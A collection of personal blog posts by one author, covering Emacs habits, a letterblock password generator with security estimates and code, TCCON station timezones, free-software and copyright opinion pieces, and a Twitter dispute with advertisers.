  • Completion which replaces the suffic, or at least M-d (Alt-d): kill world or rest of word. ——— You can remap Alt-d in IntelliJ to kill to word end
  • Activate selection mark, navigate, kill all code in-between mark and current point. The Emacs live plugin is close, but not good enough.

2.3 windows

  • Commands with M-x, fuzzy matched, and without settings-window-names getting in the way. I half-ways replace that with C-S-a
  • closing other windows with x1 (actual "x1" thanks to key-chords-mode). Deeper: Natural use of multiple windows.
  • storing a window configuration in a register and retrieving it later
  • Truly having two windows side-by-side with two points and switching with xo or xö (C-x o).

2.4 files

  • Fuzzy matching in buffer-list with bf (as chord or with C-x b).

2.5 interop

  • Linking to code files from my org-mode planning file.

2.6 movement

  • dumb-jump to test
  • Navigation with C-n / C-p / M-b / M-f. That avoids having to move to the arrow keys.
  • back to last edit which stays in the buffer. I can switch between buffers with bf, and after I just want to go back to where I last edited this buffer. Multi-file back-to-last-change is also nice (as IntelliJ provides it), but it’s not complete.

2.7 Feeling fast

  • Somehow all the things I need to do in IntelliJ feel slow. Maybe that’s because a million lines of code is a lot. Maybe because it keeps a huge amount of state. Or because Maven is slow. But it feels like I’m regularly waiting for something to refresh itself.
  • IntelliJ feels slow, because it often opens dialogs before they accept keyboard input. To reproduce: start a global search (with CTRL-shift-F) and start typing. It misses my first keystrokes. Emacs takes all keystrokes.

2.8 other

  • Having the shell just an M-! away, in the same folder as the code file.
  • ripgrep
  • A colleague said today “I wish we had tabs grouped by type”. I could not suppress saying “emacs does this — with tabbar-mode”.
  • Inline merge-conflict highlighting (I actually switch from IntelliJ to Emacs for that).
  • glasses-mode to highlight capital letters in camelCase.

Wicked Words! on Patreon

John Wick is entering the patreon arena with the Wicked Words! Magazine: Adventures, GM Advice, Little Games, Stories, The Works!

There’s an update with a Happy ending on 1w6.org/english/wicked-words-patreon!

  Yay!

This is really good news for online publishing, because it shows by example how roleplaying games and shortstories enter a new stage on the web: Fan-Funded periodicals. I expected this to become mainstream much earlier, just like webcomics have become big a few years ago, but the hassle of paying small amounts online has been a major impediment, I think, and different from webcomics, it is pretty hard to fund good writing with advertising without scaring away your readers: Text needs prolonged attention.

With Patreon this is now easy - you can ensure a creator that they will get money for every work they create, as long as they keep creating works which you enjoy.

  Nay…

There are only two problems with the approach by John Wick:

(1) “You'll need to enter your credit card information before you can start pledging to support your favorite creators. We use Stripe to handle our incoming payments. PayPal support is coming soon.”

No, I do not want to get (or use) a credit card for that.

They should just get a european partner who handles bank transfers - should be easy now that there’s SEPA. Flattr should already have all infrastructure for that in place - and actually provides an orthogonal service, so it would not endanger its own business model by collaborating with Patreon.

(2) The Wicked Words! magazine is otherwise only available for payment, so Patreon just acts as a subscription service.

Generally Patreon is similar to Flattr - but where Flattr caters to the patrons (you have a giving flatrate which is spread over the things you see), Patreon caters to the creators (they get ensured income). And releasing only to Patrons massively undersells the chances of Patreon: After all, I want to be patron, because I like something and not because that’s the cheapest way to get it.

  Utopia

Ideally a creator should use both Patreon and Flattr: Give patrons something extra (for example a mention - just something which creates warm fuzzy feelings), but also release everything for free on the web - with a Flattr button, so people who come across it can contribute.

That would also make it easy for me to share a PDF with my players and know that my players can give extra money if they like it.

  It works!

For example Smooth Mc Groove does that: Patrons get the same videos as all others, but they have the good feeling that they ensure that he can keep creating, and you can voluntarily support him via flattr if you liked what you watched - which I regularly do.

This two-tiered approach to self-financing allows fans to support their idols while also making it easy to discover and support new stuff, because Patreon makes it easy to promise regular payment and as soon as you use Flattr, there is virtually no barrier anymore to support someone new. And if you happen to flattr the creator often, you can think about becoming a patron.

And this is where I hope Wicked Words! will move, too: Freedom for Patrons to share, freedom for casual readers to give when they want and a secure income for the creators.

fonättikl inglisch

The slaves we freed,

This is what I read,

And yesterday I read,

That they all fled.

PS: The title is “phonetical english”, written in a way, that germans can just read it aloud to speak it correctly.

letterblock passwords: secure, memorable, easy to type

Update 2021: An improved version that is viable for analog password creation can be found at Letterblock Diceware Passwords.

Do you want to have secure passwords which are memorable and easy to type? Did you use diceware just to find out that the rate of typos when writing 6 words with 30 letters in total without seeing what you type can be aggravating — especially when you have to enter your password several times a day?

The algorithm here generates secure Letterblock passwords which are easy to type and to remember. Try it:

Length:   Password:
Get this code via npm install securepasswords
There is also a version in Python and one in wisp Scheme.

 

A major part of this article is concerned with a security estimate of the generated passwords, but firstoff, here’s an example of a password which should survive an attack leveraging all smartphones on the planet until at least 2021 at the current development speed of technology:

hXFV!4Vgf-LrgS

And here’s one which should outlast a type II civilization:

HArw-CUCG+AxRg-WAVN-5KRC*1bRq.v9Tc+SAgG,QfUc

Let’s ramp up security of passwords while making them easier to remember.

Update Also see Keylength - ECRYPT II report on key sizes. The report provides a clean overview of several different recommendations. In short: Use 128 bits. With the method shown here this is equivalent to using 5 blocks of 4 letters (length 20).

Password Generation

The method used here is pretty simple: Use blocks of four letters, chosen at random from a set of safely recognizable characters which are in the same position on German and US Keyboards. Delimit blocks by a delimiter chosen at random from another set of characters.

The sets of characters are:

For the blocks: NewBase60 without yz_. 55 letters, 5.78 bits of entropy per letter.

define qwertysafeletters "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"

For the delimiters: ,.! plus symbols from the numpad. 7 letters, 2.8 bits of entropy per delimiter

define delimiters ",.+-*/!"

These passwords hit the same letters on US and German keyboards, because I’m from Germany, and having to find letters like $#:\; is horrible when the keyboard reverted to US English, or when typing on the keyboard of a colleague.

Code to realize this is given in the Appendix.

Security estimate

(the code for all these calculations is available in securepassword.w from the wisp repository)

Speed of current attacks

As of 2011, a single device can do 2,800,000,000 guesses per second. Today this should be 10 billion guesses per second. According to a recovery company which sells crackers at 1.5k$, as of 2016 a zip-file can be attacked with 100,000 guesses per second. Ars Technica reports 8 billion attacks on md5 on a single device in 20131.

Codinghorror quotes2 codohale3 on the cost of buying 5 billion cracked md5 hashes per second in 2010 for just 3$ per hour. This should be around 20 billion guesses per second today.

I will from now on call 20 billion guesses per second for 3$ per hour the "strong attack" and 100,000 guesses per second the "weak attack".

8 letters + 1 delimiter: 12$ (strong attack) or till 2031 (weak attack)

A password with 8 letters and 1 delimiter (entropy 49) would on average withstand the strong attack with a single device for 4 hours, so you could buy a cracked md5-secured 8 letter + 1 delimiter password for 12$ (assuming that it was salted, otherwise you can buy all these md5’ed passwords together for around 24$).

The 8 letter and 1 delimiter password would withstand the weak attack until 2031 (when it would be cracked in one year, with a cost of 26k$), assuming doubling of processing power every two years. Cracking it in one day would be possible in 2048, paying just 72$.

(yearstillcrackable 49)
=> ((in-one-second 64.78071905112638)
    (in-one-day 31.983231667249996)
    (in-one-year 14.957750741642995))

12 letters, 2 delimiters: till 2047 (strong) or 2021 (Facebook)

A password with 12 letters and 2 delimiters (length 12, entropy 75) should withstand the strong attack until 2047 (then it would be cracked in one year), assuming doubling of processing power every two years, the weak until 2083.

For every factor of 1000 (i.e. 1024 computers), the time to get a solution is reduced by 20 years. Using every existing cell phone, the 12 letter key would be cracked by the method with 100,000 guesses per second in 2021 (within one year). Facebook could do that with Javascript, so you might want to use a longer password if your data has to be secure against the whole planet for longer than 5 years.

(yearstillcrackable 75 #:guesses/second 1.e5 #:number-of-devices 2.e9)
=> ((in-one-second 54.986013343153864)
    (in-one-day 22.188525959277467)
    (in-one-year 5.163045033670471))

28 letters, 6 delimiters: outlast human civilization

Using Landauer’s principle4, we can estimate the minimum energy needed to to check a password solution with a computer at room temperature, assuming that reversible entropy computing isn’t realized and quantum computers have to stick to Landauer’s limit: A single bit-flip requires approximately 3 Zeptojoule5 at room temperature, so we can flip 333 e18 bits per second with one Watt of Energy. Processing any information requires at least one bit-flip. Reducing the temperature to 1.e-7K (reachable with evaporative cooling) would theoretically allow increasing the bit flips per Joule to 1e30. That gives a plausible maximum of password checks per expended energy. Assuming that someone would dedicate a large nuclear powerplant with 1 Gigawatt of output to cracking your password, a 160 bit password would withstand the attack for about 23 years.

With the password scheme described here, a password with 28 letters and 6 delimiters (178 bits of entropy) should be secure for almost 6 million years in the Landauer limit at 1.e-7K, with the energy of a large nuclear power plant devoted to cracking it.

(years-to-crack-landau-limit-evaporative-cooling-nuclear-powerplant 178) => 6070231.659195759

With 24 letters and 5 delimiters it would only last about one month, though. Mind exponentials and the linear limit of the human lifespan :)

An example of a 28 letter, 6 delimiter password would be:

7XAG,isCF+soGX.f8i6,Vf7P+pG3J!4Xhf

Don’t use this one, though :)

36 letters, 8 delimiters: outlast a type II civilization

However using the total energy output of the sun (about 0.5e21 W), a 28 letter, 6 delimiter password would survive for just about 6 minutes. To reach 50 years of password survival against an attacker harnessing the energy of the sun (a type II civilization on the Kardashev scale6 devoting its whole civilization to cracking your password), you’d need 200 bits of entropy: 32 letters and 7 delimiters. A 36 letter, 8 delimiter password (230 bits of entropy) would last about 54 billion years. With that it would very likely outlast that civilization (especially if the civilization devotes all its power to crack your password) and maybe even its star. They could in theory just get lucky, though.

If you ever wanted to anger a type II civilization, encrypt their vital information with a 36 letter, 8 delimiter password like this:

HArw-CUCG+AxRg-WAVN-5KRC*1bRq.v9Tc+SAgG,QfUc

Keep in mind, though, that they might have other means to get it than brute force. And when they come for you, they will all be really angry :)

Or they might just have developed reversible computing, then all these computations are just a fun game to stretch the mind :)

Conclusion

Passwords built from delimited blocks of letters are easy to memorize and if you use 12 letters with 2 delimiters it should even withstand everything Facebook can throw at you for a few years, if you use a serious hashing algorithm.

So please make your next password look like this:

a70q-PjoL.wmew

Generate a new password (but please do not trust it, except if you copy this website and use it offline):

Length:   Password:

If you want to anger a whole type II civilization, you’ll have to go for 36 letters, though.

Appendix: The code

Javascript

Try the code:

Length:   Password:
/* @license magnet:?xt=urn:btih:0ef1b8170b3b615170ff270def6427c317705f85&dn=lgpl-3.0.txt LGPL-v3-or-Later */
var letters = "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx";
var delimiters = ",.+-*/!";
function password(nletters) {
    var pw = "";
    for (i=0; i<nletters; i++) {
        if (i%4 == 0 && i != 0 && i != nletters){
            pw += delimiters.charAt(Math.floor(Math.random() * delimiters.length))
        }
        pw += letters.charAt(Math.floor(Math.random() * letters.length));
    }
    return pw;
}
/* @license-end */

Python

from random import choice
letters = "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"
delimiters = ",.+-*/!"
def password(nletters):
    """
    Generate a password with the given number of letters (not counting
    delimiters).
    """
    pw = ""
    for i in range(nletters):
        if i%4 == 0 and i != 0 and i != nletters:
            pw += choice(delimiters)
        pw += choice(letters)
    return pw

Wisp (original code)

Full code available in securepassword.w

import
    only (srfi srfi-27) random-source-make-integers
      . make-random-source random-source-randomize!
    only (srfi srfi-1) iota
    srfi srfi-42

;; newbase60 without yz_: 55 letters, 5.78 bits of entropy per letter.
define qwertysafeletters "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"
;; delimiters: 2.8 bits of entropy per delimiter, in the same place on main keys or the num-pad.
define delimiters ",.+-*/!"

define random-source : make-random-source
random-source-randomize! random-source

define random-integer 
       random-source-make-integers random-source

define : randomletter letters
      string-ref letters
        random-integer
          string-length letters

define : password nletters
       . "Generate a password with the given length in letters 
(not counting delimiters)."
       list->string
         append-ec (: i (iota nletters 1))
           cons : randomletter qwertysafeletters
             if : and (not (= i nletters)) : zero? : modulo i 4
                cons : randomletter delimiters
                  list
                list

timezones of tccon stations

Timezones of most active TCCON stations in UTC+x (without daylight saving time (DST). Because I needed it and could not find a simple list quickly.

anmyondo: +9,
ascension: 0,
bialystok: +1,
bremen: +1,
caltech: -8,
darwin: 9, # Timezones2008 says 9 1/2???
eureka: -6,
garmisch: +1,
izana: 0,
jpl: -8,
karlsruhe: +1,
lamont: -6,
lauder: +12,
nyalesund: +1,
orleans: -6,
parkfalls: -7,
reunion: +4,
saga: +9,
sodankyla: +2,
tsukuba: +9,
wollongong: 10

via the list from the TCCON wiki, Timezones2008 from Wikimedia and Marble Desktop Globe.

Comments

Comments ... in the pages linked below.

free software, unfree software, ethics and social behaviour

Some of my answers to basic questions

Written in a survey about attitudes towards free software.

Is proprietary (=unfree) software immoral or unethical?

it isn't immoral (moral = what's the current stance of mainstream society), but it is unethical when solidarity and self-determination are part of your ethical axioms.

In a society where people are used to being forbidden to give bread to a starving child, giving bread you'd otherwise throw away to that child instead could well be immoral.

So only software which allows you to act ethically is ethical - and that's free software. Even better is free software under strong copyleft licenses like the GPL, because that protects our right to act ethically for any future versions of the software.

Do you believe that proprietary software is "illegitimate"?

No.

Legitimate doesn't mean "not contrary to existing law". Even in countries where the police is allowed to torture people, torture is illegitimate. At least that's my understanding. It means that something is wrong and should be forbidden.

I believe that people have the right to make unfree software (people also have the right to do tv-shows like "popstars"). I don't think anyone should use that software, though.

I can't force people to adher to my code of ethics without acting against my ethics myself. But I can try to convince them that my understanding of ethics is right.

Do you believe that proprietary software is "antisocial"?

In many cases yes. But it depends on the case.

Note

If I had to develop unfree software to earn enough to live a more or less comforting life, I'd likely choose to do so. That's why I fight now, so I can earn money ethically later on. Or at least enable my children to do so (more detailed in german).

"Creative Content in a European Digital Single Market: Challenges for the Future"

-> sent to avpolicy@ec.europa.eu, markt-d1@ec.europa.eu in reply to "Creative Content in a European Digital Single Market: Challenges for the Future" as published by the european commission.

Thanks to Glynmoody for getting the word out!

Dear European Commission,

Summary: The goal of copyright is to get more money to more authors and more cultural works to more citizens. Due to the changes the free copying of the internet brings, additional protection doesn't help achieve that goal.
The proposal paper goes into many technical details, but loses the focus on the benefit of copyright to the citizens - and what kind of copyright protection is useful today.
Due to this, many of the measures (especially DRM) have to be reevaluated, if they really benefit our society and cultural development, or only try to cement a status which doesn't benefit the citizens in the light of the changes to technology and consumption of cultural works.

Please keep in mind that copyright is no inherent right. Instead it's a state given information monopoly with a simple goal: Increase the quality and quantity of creative works available to everyone.

As such, copyright law grants authors (copyright holders) the right to control who may be in possession of their works, because being able to make money with ones creations helps creating more and higher quality works.

Also it grants middlemen the right to make money from copies by establishing treaties with authors. These middlemen are useful, as long as they offer a major contribution in getting the works to the public and getting money to the author.

And it grants fair use rights to all citizens, which helps spreading the works and enabling more people to enjoy our culture the way they enjoy it most. These fair use rights are being accompanied by flat payments which are given directly to the authors, so creators of creative works money from an additional pool whose size is related to the amount of cultural works people share.

Currently the best balance between these different kinds of rights (copyright of the creator, use rights of the middlemen and fair use rights of the citizens) is changing due to almost costfree copying of digital content.

Now the middlemen often no longer serve as waybuilders between authors and citizens, but as gatekeepers who lock out citizens from our culture. Also they often take a high percentage of the money citizens pay for cultural works, even though their costs for spreading works (and finding good works) were reduced greatly. When a musician gets a few tens of a Euro from each sale of a 15 Euro CD, it's quite clear that the middlemen use up money which then doesn't help the authors create more cultural works.

Traditional (expensive) ways of spreading content are becoming unnecessary by the faster ways of spreading content digitally. But the middlemen control the flow of content from author to citizens (partly by copyright law), and they use their control to draw a major share from the money citizens want to give the author of the works they enjoy.

More: They often also hinder citizens from telling others about the works they like. In the digital world, people can instantly send music they enjoy to their friends, and if their friends like it, they can buy it - or send it onward to other people who might like it more. And once someone gets something she/he enjoys very much, she/he most times wants to give the author money, so the author can create more works she/he enjoys.

By using "illegal downloads", people learn about new works and decide whether they are worth paying money - and recent studies show that those who use p2p networks to download music illegally are also the ones who buy the most music.

Because of this, I think that the paper focusses too much on the "protection of the copyrightholders" and too little on the question, how laws can help making as many cultural goods available to every citizen as possible. So I want to offer some thoughts:

To achieve that goal, copyright always has to strike a balance between different objectives:

1) Authors need money to be able to work full time. So they want as much money as possible for their works. Some kinds of works take far longer to create, but have great cultural value (for example science books and investigative journalism), so authors who spend very much time on research (or similar) need a way to earn enough from their work, even though they have a smaller quantitative output.

2) Citizens want as much culture they enjoy as possible for the money they have available.

3) Authors and citizens need to find each other, so the citizens can find works they enjoy.

4) Cultural works have to be brought from the authors to the citizens and money has to be brought from citizens to authors of works they enjoy (with as little loss as possible). "Bringing works to the citizens" can include polishing the work, so the citizens can enjoy the works more. A book with 10 errors on each page is very hard to enjoy for most people, as is one with glaring errors in the plot. And a CD without coverimage will find far fewer listeners, regardless of the quality of the music.

In earlier times, the balance which brought citizens the highest amount of cultural works they enjoy was to have big middlemen who were able to shoulder the high cost for printing books, recording tapes, pressing CDs and carrying these from country to country (as well as a part of the risk of promoting unknown authors).

Today the cost for spreading cultural works is almost zero (more exactly: We already pay it by paying for our broadband connections) and finding an author I enjoy is easier with a search engine or using resources written by online communities for free, so the best balance is shifted. Due to this, having stronger fair use rights (so people can more easily pass on works and turn others into paying fans of an author) could be a far more efficient way to bring cultural works to everyone while paying the authors.

And stronger protection of "rightholders" (which today more often serve as gateeepers than waybuilders) could backfire quite badly and harm the cultural development of Europe (even today musicians complain, that they only get a very minor share of the money people pay for their works).

And since the cost of spreading a cultural work to people is almost zero (with technologies developed in filesharing communities, even the bandwidth cost drops to almost zero, since every participant contributes some bandwidth for spreading the work), so there is no real reason, why someone who has only 15€ to spare each month should enjoy far fewer cultural works than someone who earns 10.000€ a month.

In earlier times, if a poor person spent 15€ on a book, more than 10€ were needed to pay for producing the book. That was a natural restriction on the number of works he could enjoy. 5€ went to the author he liked best (if the author was very lucky), because he could only pay for at most one book. He couldn't afford to read works from other authors.

Today that same person could read 15 books and pay 5€ to the 3 authors she/he likes best, and the author of the first book would gain just as much money, two others would get money (who wouldn't have gotten money otherwise), and the remaining 12 authors wouldn't lose anything compared to the high-production-cost alternative.

And this clearly shows a glaring error in ever increasing the "protection" of monopolies: Someone who has 15€ to spend on cultural works doesn't get more money to spend if he can't read works for free. So the main question is, how to get the people to give the money they have available to the authors while giving them as much access to cultural works as possible. And since for example in germany about 50% of the citizens have too little money to pay any relevant amount of taxes, this thought is valid for about 50% of the people in germany.

Adapting copyright laws to the current times has to take into account how copyright laws benefit the society. Copyright monopoly rights are being granted by the state (since we're living in a democracy that means: by all citizens) to individuals for the benefit of all citizens. So the goal of any copyright change should be to benefit all citizens.

It's the interest of society, that as many people as possible can enjoy as many cultural works as possible.

Criminalizing most citizens doesn't come close to that goal. And restricting what people can do with works they purchased (DRM), doesn't achieve that, either. Both only protect the middlemen, but neither the authors (or their income from which DRM is effectively financed), nor the citizens. DRM makes spreading cultural works more expensive, so it harms authors as well as citizens. It adds a needless control structure which sucks away money that should go to the authors.

And people like Howard Taylor (the creator of the free webcomic http://schlockmercenary.com) and all the free software programmers out there who make a living with their programming show that many citizens today are mature enough to pay for the things they enjoy, even though there is no gatekeeper forcing them to.

So please leave the "we need more protection" track. What we need is more money for more authors and more cultural works for citizens.

Cementing the current power-structures in creative business despite the changing technological environment doesn't achieve that.

When considering, how a single-market (a market accessible to everyone in the same way) affects the creation and spreading of creative works, the focus should instead be on comparing the different possible approaches how to strengthen the creation and spreading of cultural works and to see which balance between these ways is most efficient. This requires rethinking the support which copyright law gives to the different revenue sources of authors (flat payments on copying devices, income from direct sales, money from middlemen, money from "additional value products" like signed copies, direct donations by fans so they keep producing, and many more) and as such adjusting the balance between state-granted monopoly rights for authors, state granted monopoly exploitation rights for middlemen and fair use rights of citizens to make it fit for the current technological and social situation.

There's one more interesting fact on that topic I want to spotlight: The german group for spreading the money from flat payments on printers and photocopies "VG-Wort"1 now pays Webloggers with money from flat payments, because they acknowledge, that these create a considerable share of currently consumed cultural works. Since most webloggers work without direct payments, this is a major change for the commercial viability of creating works which are freely available to everyone with an internet connection, regardless of the financial situation.

At the same time, projects like Creative Commons2 show, that for a major share of authors of creative works it is most important that noone can misrepresent their content as the creation of someone else, while "forbidding people to pass on the work without making money from it" isn't very interesting (and isn't even useful financially for lesser known authors, because it stops people from spreading the word about the author).

So the first question to be answered is not "how can we ensure that the copyright protection holds in the light of current technology", but "which balance of monopoly protection, fair use rights and direct state-support of authors (like the sponsoring of theaters in germany) is most efficient in achieving the goal to enable as many citizens as possible to have access to as many cultural works as possible in the changed technological environment". Detailed questions about monopoly protection schemes and such (and which of them benefit our society today) only make sense once this basic question has been answered for the current situation.

And "Copyright is the basis for creativity" isn't an answer to that question, because it a) is clearly wrong. People created at all times, while copyright law is only a few hundred years old, and b) doesn't answer, how copyright law benefits European citizens - and how that benefit changes with digitization where every act of viewing is in fact a copy.

Best wishes, Arne Babenhauserheide

PS: Some additional notes:

  • on differing content and goals: The content of the article shows a nice overview of problems of the current licensing system between companies, while the 'Strategy for "Creative Content Online"' talks of goals (DRM, filesharing prevention) which aren't more than brushed by the content.

  • on the focus of the paper: Important topics like user/created content are only named but missing the simple point, that most of these works are simply illegal today. Companies can clear their licensing with each other - they don't necessarily need new rights for that. But most citizens can't. They can't just sit together and decide to only buy media licensed under specific terms, because the companies can almost completely control the supply. Ordinary citizens are the ones who need clearer laws. And in a democracy, they are the ones for whom laws should be made.

  • on "financial incentives for creatives": As psychological studies show, creativity is best fostered by giving creatives enough money to live a comforting live, but the hunt for as much money as possible can stifle creativity instead of strengthening it. So strengthening a single-minded market-driven revenue model for a state-given monopoly doesn't help create creative works of higher quality.

  • on the justification of copyright itself: You can also find related thoughts about the reasons for having certain kinds of copyright (in german) at http://draketo.de/licht/politik/geistiges-eigentum-sinn-des-urheberrecht...

  • on DRM systems: DRM-systems establish a control inside peoples computers which isn't in turn legitimated and controlled by the state. As such it takes the role of the police without being authorized by the state (which in turn is being authorized by the citizens). To force citizens to accept this additional foreign-control on their actions, middlemen abuse the monopolies granted by copyright law, because these give them the right to establish new rules on how their content may be consumed. That way the DRM restrictions are being established with powers granted by the state, though they aren't legitimated by democratic processes. They even undermine fair use rights. Also any DRM system breaks the premise, that people are free to act, as long as they are willing to face the legal consequences. While I am free to ignore speed limits when I'm on the way to the hospital because my daughter is bleeding to death on the backseat, but might lose my drivers license afterwards (what's a drivers license compared to the death of a daughter?), a DRM system would keep me from taking that decision and would force me to let my daughter die, because my car simply wouldn't drive faster than allowed. That way DRM systems break the premise of the responsible citizen, but since any democracy requires responsible citizens as its basic premise, this leads our whole legal system ad absurdum. So DRM shouldn't be supported by laws. Also fair use laws need to be protected against DRM restrictions. These restrictions are forced on people by using the monopoly granted by copyright law, and they keep people from exercising their fair use rights, granted by the same copyright laws.

  • on "culture industry": A culture industry isn't useful for society by definition. It is only useful, if it helps getting more and more enjoyable cultural works to everyone (or at least the vast majority of citizens - including those who earn only very little money). Only in that case is it warranted to give it any additional legal support.

  • on "market as regulator": Using the "market" to regulate the behavior of the middlemen with the power of the consumers doesn't work, because copyrighted works are monopolies by law and the market only works without monopolies. Creative works can't directly compete against each other, because people have no way of getting an equivalent alternative since every creative work is unique.

  • on forcing people to pay: Today almost noone is forced to pay for any digital goods, because almost everything is available for unpaid download somehow (sometimes illegally). That people still pay for the creative works they enjoy shows clearly, that most people want to pay authors for the goods they enjoy. That's something which is deeply engrained in our psyche: If someone gives us something, we want to give something back. Due to these two effects, it's quite clear that building bigger and bigger restrictions into legally bought content only harms the people who want to give the authors money. It would be far more useful to establish a system which enables people to securely and effortlessly give a few Euro to someone else - or even just a few cents. A "one click donation" which every EU citizen could use, could give authors of creative works far more support than any "harmonization of restriction management systems".

  • on me: I am a stakeholder, as I am at the same time a music and book customer, a hobby free software programmer and a hobby writer who publishes under free licenses (on http://draketo.de and http://1w6.org ). I learned about the music genre I enjoy the most (Filk) when I downloaded some tracks in a filesharing network many years ago and I now own more CDs of that genre than of any other genre - and every year I add three or four CDs to my collection. If there had been any effective fair-use-prevention-measure in place back then, I still wouldn't know my favorite kind of music and I still wouldn't buy more than one CD every two years or so.

"Person caught who stole IDs via Gnutella" - ridiculous p2p bashing

Comment to LimeWire ID theft case.

That means, people who spread child porn were caught because they used public p2p networks (where law enforcement can find them), and instead of thanking LimeWire that they were able to catch a criminal because he was lured in the open (instead of selling the material invisible via the postal service), politicians blame LimeWire for the existence of the material which had existed in the dark long before Gnutella made sharing easy and public.

These people don't become criminals because of LimeWire.

But they get caught because they use it and don't realize that everyone can find what they share and track them down - including the cops.

As soon as the crime is bad enough that the cops inquire at a court to get the data of the criminal internet user, that user can easily be tracked down. It's far less effort than stopping someone from sending illegal material via the postal service.

So LimeWire and public p2p help the cops.

That ID theft case is even weaker. It is as if we'd ban cars because some people forget to lock them - or ban wallets because some people lose them (including their ID). The main difference is that you have to actively disable security to lose your ID via LimeWire while your wallet just slips out.

Somehow I smell other motivations than stopping crimes here...

A downside of networking and public reputation: No communication for the sake of communication (alone)

-> A comment on The Importance of Managing Your Online Reputation.

I read your article, and I found the points you make very interesting, though not only in a positive way.

You tackle the “we have a network others can see” from the active side: “How can I make sure my employer likes what he sees?”.

But there's also the other side: We use the web for communicating with people, and this communication is being pulled into the open, and everything we do online is being instrumentalized to draw information about us.

This also means that no communication over a public channel can be done for the sake of the communication itself, and so the channel becomes more and more useless for any creative communication (as opposed to just exchanging preconceived and unchanging ideas).

This might sound hard, but it stems from two concepts:

  • When we want to act creatively, we are most efficient, when we do it for the sake of the activity itself. -> http://www.gnu.org/philosophy/motivation.html

  • When people know that they are being watched, they act differently (sadly I have no link on this).

Another issue is an adaption of the “unclear prophecy” problem: If people know that their online activity is being measured, they will change their behaviour to please their intended future employer, and so a measurement doesn't give you estimations about the person which are relevant to the job. Instead it only measures one parameter: “How good are you at conscious social network building?”

And for many jobs that skill is almost irrelevant.

So using public communication for calculating a score of some kind runs into a paradox as soon as people know that they are screened, and it harms normal communication. Due to that I hope, that more and more people will realize that unscreenable but efficient communication is important.

For example a network similar to identi.ca / twitter could be built on jabber with decentral buddy-lists, which can't easily be read out as massively as twitter, and the really paranoid could completely switch over to freenet as their news communication provider: http://freenetproject.org

ACTA - A trend to be reversed

A reply to a comment on slashdot named Can we fight the trend?:

There was a trend to having only proprietary software (by former free software being enslaved in the job contracts its creators took) and to having the hacker community die out.

That trend was reversed by GNU with the invention of the GPL and the GNU System.

And today millions of people use free software and we have organizations like the EFF and FSF who work for a free software society.

- That huge success story in about 4 minutes: infinite-hands.draketo.de

More people than ever before use free software, and it becomes an integral part of out society as more and more government offices (e.g. in germany: Munich) and companies adopt it.

Today we have a trend to having only nonfree culture (by the laws being turned upside down and politicians being bought) and members of the free speech community to give up.

What I learn from history is:

That trend can be reversed, too, and our society might become a free culture society, just like it slowly becomes a free software society, even though most people will only realize it in hindsight.

"Do you still remember the times, when every office had Windows in it?"

"Only barely, but do you still remember the times, when we feared lawsuits when we accessed the predecessors of the culture pool?"

"Sure! Those were the times. Now, let's get writing again. Don't want to let our fans wait for the next storyarch, do we?"

The ones who profit from unfree media will give a fight this time, though.

And that they choose to go semi-criminal shows, that different from the proprietary software vendors back when GNU was invented, the unfree media companies are already losing, and they know it.

ACTA horror - what can we do?

a comment to: Embattled ACTA Negotiations Next Week In Geneva; US Sees Signing This Year:

I didn't yet manage to get really safe information on what ACTA actually does (that's a marker for 'this is dangerous' in itself), but what I see on wikileaks sounds horrible:

"The deal would create a international regulator that could turn border guards and other public security personnel into copyright police. The security officials would be charged with checking laptops, iPods and even cellular phones for content that "infringes" on copyright laws, such as ripped CDs and movies."
- http://wikileaks.org/wiki/ACTA_trade_agreement_negotiation_lacks_transpa...

'Check my laptops content'???

What about my electronic diary, then?

Without a clear judges sentence, noone is allowed to look at my private files, and should they remove that restriction, they can as well remove all privacy.

And it gets worse:
"The guards would also be responsible for determining what is infringing content and what is not."

and worse:

"Mr. Fewer and Mr. Geist said, once Canada signs the new trade agreement it will be next to impossible to back out of it.
In a situation similar to what happened in the Softwood Lumber trade dispute, Canadians could face hefty penalties if it does not comply with ACTA after the agreement has been completed."

Ouch!
That doesn't sound like a treaty between nations, but more like some big players conspiring to create law which binds all others, and that clearly is antidemocratic.

So a big question looms: What can we do against ACTA?

What can we do?

Ways to act I found:

Advertisers threatened me on twitter for ridiculing their misleading ad

hackers

hackers

ArneBab:
  2016: Hackers can now steal the #slowblood scanning biometric data from Android phones.

colortext: hackers

Today advertisers answered a tweet with a link to a story about the possibility to steal fingerprints remotely from Android phones with a blatant advertisement for their “superior” “proprietary” technology. When I ridiculed their advertisement, they threatened me. Let’s call them colortext and their brand #slowblood.12

I was annoyed at the ad, but I decided to answer with a smile:

2016: Hackers can now steal the #slowblood scanning biometric data from Android phones.

They answered

(Tech) cannot be compromised or recreated unlike fingerprints.

And that’s quite a claim, so it just called for a counter:

2017: CCC hackers log into Merkelphone with a 30€ bioprint of remotely copied #slowblood data.3

and added

you get snide remarks for your blatant self-advertisement of proprietary tech.

…and for “can’t be compromised” ← that is a HUGE claim.

to which they first answered with a twinkle

…-letting people know there’s a superior alternative ;)

but after I replied

or was this an offer to send the hackers your security system so they can test it?

…(in that case I would take back my criticism)

they went on to threaten me:

You are tweeting lies and using our trademark without consent.

I felt a sudden pang of fear. Still I answered

[…] are you threatening me for using the same hashtag as you?

2018: #slowblood developers at colortext realize that 2016 and 2017 were in the future back in 2015

But despite the irony in the text my heart was thumping hard. That threat is a serious one. I reported it to twitter:

report

A few minutes later their tweets were gone — but I had expected that and taken screenshots. I’m writing about it, because I consider their actions unacceptable behavior - and because my heartbeat isn’t completely back to normal yet. Their harassment works, so they have to be called out for it.

Note: Different from the rest of my page this image is not GPL licensed because it contains text from them as proof of their actions. Their individual lines do not constituate a creative effort, but the combined text might reach the threshold of intentional creative [inappropriate word omitted].

conversation

In notification view which includes a few additional tweets (dear twitter, this is a bug!):

conversation


  1. I will not name them here because they later threatened me with a trademark violation. The name is in the pictures because I’m pretty sure that if they use their brand as hashtag, the hashtag is fair game on twitter. In this text I’ll instead use the names colortext for the company and and #slowblood for the tech. 

